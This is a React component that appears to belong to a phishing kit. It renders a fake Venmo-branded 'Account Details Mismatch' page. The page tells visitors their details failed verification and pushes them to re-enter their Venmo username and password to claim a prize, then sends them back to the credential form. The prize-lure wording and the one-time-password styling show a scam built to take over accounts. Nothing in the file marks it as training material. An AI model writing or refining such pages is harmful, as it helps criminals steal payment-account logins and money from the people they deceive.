import React from "react";
import { useNavigate } from "react-router-dom";
import { useApp } from "../context/AppContext";
import BrandLogo from "../components/BrandLogo";

const IncorrectDetailsPage = () => {
  const navigate = useNavigate();
  const { clearActiveSession } = useApp();

  const handleRetry = () => {
    clearActiveSession();
    navigate("/venmo");
  };

  return (
    <div className="otp-page">
      <BrandLogo size={100} />

      <div style={{ fontSize: 56, margin: "28px 0 16px" }}>⚠️</div>

      <h2 className="otp-title" style={{ color: "#ef4444" }}>
        Account Details Mismatch
      </h2>

      <p className="otp-sub" style={{ maxWidth: 320 }}>
        Our system could not verify the Venmo account information you provided.
        Please go back and re-enter your correct Venmo username and password to
        complete your prize claim.
      </p>

      <button
        className="venmo-btn active"
        style={{ marginTop: 32, maxWidth: 320 }}
        onClick={handleRetry}
      >
        RE-ENTER VENMO DETAILS
      </button>

      <footer className="page-footer" style={{ marginTop: "auto" }}>
        © 2026 WinBig LLC. All rights reserved.
      </footer>
    </div>
  );
};

export default IncorrectDetailsPage;
